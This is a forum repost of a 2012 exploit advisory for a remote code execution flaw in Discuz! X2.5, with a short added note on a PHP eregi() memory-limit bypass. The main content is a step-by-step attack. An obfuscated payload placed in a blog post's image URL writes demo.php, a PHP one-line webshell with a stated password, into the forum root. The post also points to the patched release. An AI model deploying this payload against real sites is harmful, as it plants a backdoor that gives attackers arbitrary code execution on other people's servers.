服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5842|回复: 0

Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]

[复制链接]
dirtysea 发表于 2012-5-21 18:05:46 | 显示全部楼层 |阅读模式
发布时间: 2012-04-27
漏洞版本:Discuz! X2.5Release20120407
漏洞描述:
Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,在实现上存在远程命令执行漏洞, 远程攻击者可利用此漏洞执行远程任意代码。要成功利用此漏洞需要目标启用seo功能。
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1,注册任意账户
2,登陆用户,发表blog日志(注意是日志)
3,添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4,访问日志,论坛根目录下生成demo.php,一句话密码C
Discuz已经发布了新版Discuz! X2.5 R20120427
http://www.discuz.net/thread-2744369-1-1.html
参考
http://sebug.net/vuldb/ssvid-60082
http://www.wooyun.org/bugs/wooyun-2012-06420
http://yaonie.org/archives/165
补充:PHP 5.4/5.3弃用eregi()函数内存限制绕过漏洞
危害
远程攻击者可以利用漏洞耗尽系统内存。
攻击所需条件
攻击者必须访问PHP应用。
漏洞信息
PHP 5.3之后弃用了基于POSIX规则表达式的函数如eregi,但在5.4.0版本中仍然使用这些函数,可被利用绕过memory_limit,通过eregi()耗尽内存。
测试方法
http://cxsecurity.com/issue/WLB-2012030271
漏洞消息链接
http://marc.info/?l=bugtraq&m=133311683110469&w=2
漏洞消息标题
PHP 5.4/5.3 deprecated eregi() memory_limit bypass
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家 ( 蜀ICP备12020351号 )

GMT+8, 2018-8-21 23:43 , Processed in 0.046258 second(s), 18 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表